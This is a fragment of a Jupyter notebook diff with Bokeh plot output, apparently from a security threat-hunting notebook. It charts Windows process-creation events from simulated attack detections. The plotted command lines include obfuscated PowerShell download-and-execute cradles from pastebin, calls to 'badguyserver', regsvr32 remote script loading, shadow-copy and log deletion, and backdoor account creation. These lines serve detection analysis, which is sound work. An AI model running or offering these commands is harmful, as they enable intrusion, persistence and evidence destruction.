fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1001\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.2.2.min.js\": \"JayppSWSRBsibIZqI8S4vAb1oFgLL0uhNvSn8cmArlOvYOwfFjYeyY5UWwJ+K0SU\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.2.2.min.js\": \"G0/Tv/Yy/zEPNsnW0Qif/FOsGesd+KIrKg/QLmvQmReuUW9qmSP7mAmr0VpiUNr3\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.2.2.min.js\": \"VLYHEbLQDk5G1+/4ALU0myoJPMEUsngWry2fzYorFOUmarjGRPLLURaeK/on6JqX\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.2.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.2.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.2.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"3aec6eb4-fe98-4fbc-9695-f1ac303ab126\" data-root-id=\"1072\"></div>\n"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/vnd.bokehjs_exec.v0+json": "",
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"7b46cde3-a6f3-4294-958d-05b83600c313\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1004\"},{\"id\":\"1036\"}]},\"id\":\"1072\",\"type\":\"Column\"},{\"attributes\":{\"source\":{\"id\":\"1002\"}},\"id\":\"1059\",\"type\":\"CDSView\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\"},\"glyph\":{\"id\":\"1056\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1057\"},\"selection_glyph\":null,\"view\":{\"id\":\"1059\"}},\"id\":\"1058\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"formatter\":{\"id\":\"1053\"},\"ticker\":{\"id\":\"1048\"}},\"id\":\"1047\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"overlay\":{\"id\":\"1028\"}},\"id\":\"1024\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1081\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"1037\",\"type\":\"Title\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1096\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1098\",\"type\":\"DaysTicker\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1060\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1060\"}]},\"id\":\"1051\",\"type\":\"Toolbar\"},{\"attributes\":{\"end\":1547529678545.3,\"start\":1547525366677.7002},\"id\":\"1007\",\"type\":\"Range1d\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1023\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1085\",\"type\":\"DaysTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1047\"},\"ticker\":null},\"id\":\"1050\",\"type\":\"Grid\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":{\"value\":\"10px\"}},\"id\":\"1052\",\"type\":\"Title\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1095\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1084\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1097\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1015\"}],\"center\":[{\"id\":\"1018\"},{\"id\":\"1022\"}],\"left\":[{\"id\":\"1019\"}],\"min_border_left\":50,\"plot_height\":300,\"plot_width\":900,\"renderers\":[{\"id\":\"1070\"}],\"title\":{\"id\":\"1005\"},\"toolbar\":{\"id\":\"1029\"},\"x_range\":{\"id\":\"1007\"},\"x_scale\":{\"id\":\"1011\"},\"y_range\":{\"id\":\"1009\"},\"y_scale\":{\"id\":\"1013\"}},\"id\":\"1004\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1082\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"tooltips\":[[\"NewProcessName\",\"@NewProcessName\"],[\"CommandLine\",\"@CommandLine\"],[\"TimeGenerated\",\"@TimeGenerated{%F %T.%3N}\"],[\"EventID\",\"@EventID\"]]},\"id\":\"1003\",\"type\":\"HoverTool\"},{\"attributes\":{},\"id\":\"1025\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"1026\",\"type\":\"SaveTool\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1086\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1099\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1080\",\"type\":\"Selection\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1027\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"1077\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"overlay\":{\"id\":\"1061\"},\"x_range\":{\"id\":\"1007\"},\"y_range\":null},\"id\":\"1060\",\"type\":\"RangeTool\"},{\"attributes\":{},\"id\":\"1020\",\"type\":\"BasicTicker\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1083\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1089\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1102\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1053\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1087\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1100\",\"type\":\"DaysTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\"},\"glyph\":{\"id\":\"1068\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1069\"},\"selection_glyph\":null,\"view\":{\"id\":\"1071\"}},\"id\":\"1070\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1013\",\"type\":\"LinearScale\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1088\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1101\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1069\",\"type\":\"Diamond\"},{\"attributes\":{\"end\":1547529858206.45,\"start\":1547525187016.5498},\"id\":\"1039\",\"type\":\"Range1d\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"1082\"},{\"id\":\"1083\"},{\"id\":\"1084\"},{\"id\":\"1085\"},{\"id\":\"1086\"},{\"id\":\"1087\"},{\"id\":\"1088\"},{\"id\":\"1089\"},{\"id\":\"1090\"},{\"id\":\"1091\"},{\"id\":\"1092\"},{\"id\":\"1093\"}]},\"id\":\"1016\",\"type\":\"DatetimeTicker\"},{\"attributes\":{},\"id\":\"1093\",\"type\":\"YearsTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1057\",\"type\":\"Circle\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1090\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1103\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1047\"},{\"id\":\"1052\"}],\"center\":[{\"id\":\"1050\"}],\"plot_height\":120,\"plot_width\":900,\"renderers\":[{\"id\":\"1058\"}],\"title\":{\"id\":\"1037\"},\"toolbar\":{\"id\":\"1051\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"1039\"},\"x_scale\":{\"id\":\"1043\"},\"y_range\":{\"id\":\"1041\"},\"y_scale\":{\"id\":\"1045\"}},\"id\":\"1036\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"navy\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1068\",\"type\":\"Diamond\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1065\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"fill_color\":{\"value\":\"navy\"},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1056\",\"type\":\"Circle\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"1065\"},\"ticker\":{\"id\":\"1016\"}},\"id\":\"1015\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1003\"},{\"id\":\"1023\"},{\"id\":\"1024\"},{\"id\":\"1025\"},{\"id\":\"1026\"},{\"id\":\"1027\"}]},\"id\":\"1029\",\"type\":\"Toolbar\"},{\"attributes\":{\"source\":{\"id\":\"1002\"}},\"id\":\"1071\",\"type\":\"CDSView\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1028\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1091\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1104\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1043\",\"type\":\"LinearScale\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"1061\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"1106\",\"type\":\"YearsTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1092\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1105\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"text\":\"Timeline: Distinct Host Processes (bottom) and All Proceses (top)\"},\"id\":\"1005\",\"type\":\"Title\"},{\"attributes\":{\"formatter\":{\"id\":\"1077\"},\"ticker\":{\"id\":\"1020\"},\"visible\":false},\"id\":\"1019\",\"type\":\"LinearAxis\"},{\"attributes\":{\"data\":{\"CommandLine\":[\".\\\\reg  not /domain:everything that /sid:shines is\\n/krbtgt:golden !\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe  C:\\\\Users\\\\MSTI\\nCAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1.\\n0.14.tmp\\\" /SL5=\\\"$250276,19992586,423424,C:\\\\Users\\\\M\\nSTICAdmin\\\\Downloads\\\\tsetup.1.0.14.exe\",\".\\\\netsh.exe  \\\"in (*.exe) do start # artificial\\ncommandline solely for purposes of triggering\\ntest\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell\\nEnable-WSManCredSSP =2013Role Server -force&echo\\n[S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell\\nwinrm set winrm/config/service/Auth\\n@{Kerberos=003D\\\"true\\\"}&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\s\\nystem32\\\\inetsrv\\\\appcmd set config \\\"Default Web\\nSite/\\\" /section:httplogging /dontLog:true&echo\\n[S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del\\nC:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo\\n[S]&cd&echo [E]\\\"\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe\\n/Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"cmd.exe /c\\nc:\\\\Diagnostics\\\\WindowsSimulateDetections.bat\\nc:\\\\Diagnostics\\\\UserTmp\",\"cmd  /c echo timb@microsoft.com;\\nromead@microsoft.com; ianhelle@microsoft.com;\\nmarcook@microsoft.com; dotanp@microsoft.com;\\nliengli@microsoft.com\",\"C:\\\\Windows\\\\system32\\\\net1  share\\nTestShare=c:\\\\testshare /Grant:Users,Read\",\"dism /online /enable-feature /featurename:File-\\nServices /NoRestart\",\"C:\\\\Windows\\\\TEMP\\\\CC563BBE-\\nDE32-44D3-8E35-F3FC78E72E40\\\\dismhost.exe\\n{D57BA872-53C0-424D-80AE-E49112D1CF04}\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\".\\\\regsvr32   /s /n /u /i:http://server/file.sct\\nscrobj.dll\",\".\\\\powershell.exe  -c \\\"$a =\\n'Download'+'String'+\\\"(('ht'+'tp://paste'+\\n'bin/'+'raw/'+'pqCwEm17'))\\\";$b = '(New-Object' + '\\nNet.WebClient)';'$b.$a' | Out-File .\\\\evil.ps1;\\\"\",\".\\\\powershell  -c {IEX (New-Object\\nNet.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f\\n':/','/paste','tp')+'bin/'+'raw/'+(\\\"{1}{0}\\\"-f'Em17\\n','pqCw')));}\",\"cmd  /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy\\nBYpa^sS i^mPOr^T-^M^oDuLE\\nbiTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^\\n'http://somedomain/best-kitten-names-1.jpg'\\n^-d^EStIN^At^IOn ^'C:\\\\Users\\\\$env:UserName\\\\AppData\\\\\\nLocal\\\\Temp\\\\kittens1.jpg';\\\"\",\".\\\\powershell  -Noninteractive -Noprofile -Command\\n\\\"Invoke-Expression Get-Process; Invoke-WebRequest\\n-Uri http://badguyserver/pwnme\\\"\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\".\\\\powershell  -command \\\"(New-Object\\nNet.WebClient).DownloadString(('ht'+'tp://pasteb'\\n+ 'bin/'+'raw/'+'pqCwEm17'));\\\"\",\"cmd  /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:Cre\\nateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe\\n-c \\\"\\\"$x=$((gp\\nHKLM:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\nCertificate).Certificate);.\\\\powershell -E\\n$y\\\"\\\"\\\",0,True)(window.close)\",\".\\\\netsh  advfirewall firewall add rule\\nname=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\app\\ndata\\\\Roaming\\\\RbtGskQ\\\\RbtGskQ.exe\",\"c:\\\\Windows\\\\System32\\\\svchost.exe  -k malicious\",\".\\\\wuauclt.exe  /C\\n\\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\sys\\ntem32\\\\inetsrv\\\\appcmd set config \\\"Default Web\\nSite/\\\" /section:httplogging /dontLog:true&echo\\n[S]&cd&echo [E]\\\"\",\"cmd  /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\"\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo\\nwsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd\\n9b-e932e7433077.zip\",\"taskhostw.exe SYSTEM\",\"\\\"cmd\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\Resources\\\\222\\\\pmfexe.exe\\\" -PerfMode optimize\\n-quickscan -event -json -alldetectors\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"cmd  /c \\\"systeminfo && systeminfo\\\"\",\".\\\\rundll32  /C 42424.exe\",\"42424.exe\",\".\\\\reg.exe  add\\n\\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell\\nSet-ExecutionPolicy RemoteSigned&echo [S]&cd&echo\\n[E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\ProgramData\\\"&copy \\\\\\\\[REDACTED\\n]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change\\nDates.docx\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"vssadmin  delete shadows /all /quiet\",\"cmd  /c echo Any questions about the commands\\nexecuted here then please contact one of\",\"C:\\\\Windows\\\\system32\\\\net1  user adm1nistrator\\nBob_testing /add\",\"net  use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare\\nBob_testing /User:adm1nistrator\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell  -command {(n`EW-obJ`E`cT N`et`.W`eb`\\nC`li`en`t).DownloadFile('https://blah/png','google\\n.png')}\",\"implant.exe  k111\",\"cmd  /c \\\"echo Invoke-Expression Get-Process;\\nInvoke-WebRequest -Uri http://badguyserver/pwnme\\\"\",\"whoami\",\"net  group \\\"Domain Admins\\\" /domain\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\".\\\\lsass.exe  /C\\n\\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"cmd  /c \\\"powershell wscript.shell used to download\\na .gif\\\"\",\"hd.exe  -pslist\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"\\\"C:\\\\Program Files\\n(x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua\\n/installsource scheduler\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"NewProcessName\":[\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-\\nDE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-1\\n4_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\Resources\\\\222\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service 